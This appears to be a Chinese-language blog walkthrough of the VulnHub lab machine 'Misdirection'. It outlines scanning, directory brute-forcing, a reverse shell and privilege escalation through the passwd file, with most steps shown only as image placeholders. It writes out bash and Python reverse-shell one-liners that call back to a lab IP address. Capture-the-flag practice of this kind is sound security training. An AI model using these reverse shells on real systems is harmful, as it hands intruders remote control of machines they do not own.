Misdirection(VulnHub)

Misdirection(VulnHub)

nmap扫描

image-20240203164134251

image-20240203164754661

image-20240203172258318

image-20240203173521959

image-20240203173548744

image-20240203164806659

目录爆破

image-20240203220722752

image-20240203220905136

80小探索

image-20240203221120213

searchsploit

image-20240203170135683

无果

8080端口渗透

image-20240203221043014

反弹shell

bash -i >& /dev/tcp/192.168.2.228/11111 0>&1

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.228",11111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20240203221740291

image-20240203221811876

sudo -l

image-20240203223958515

设变量清屏

image-20240203224521967

brexit用户渗透

image-20240203224711794

image-20240203224845835

查看敏感文件

image-20240203225551515

通过psswd提权

image-20240203232318991

image-20240203232402521

image-20240203232423553

posted @ 2024-02-25 20:40  gcc_com  阅读(26)  评论(0)    收藏  举报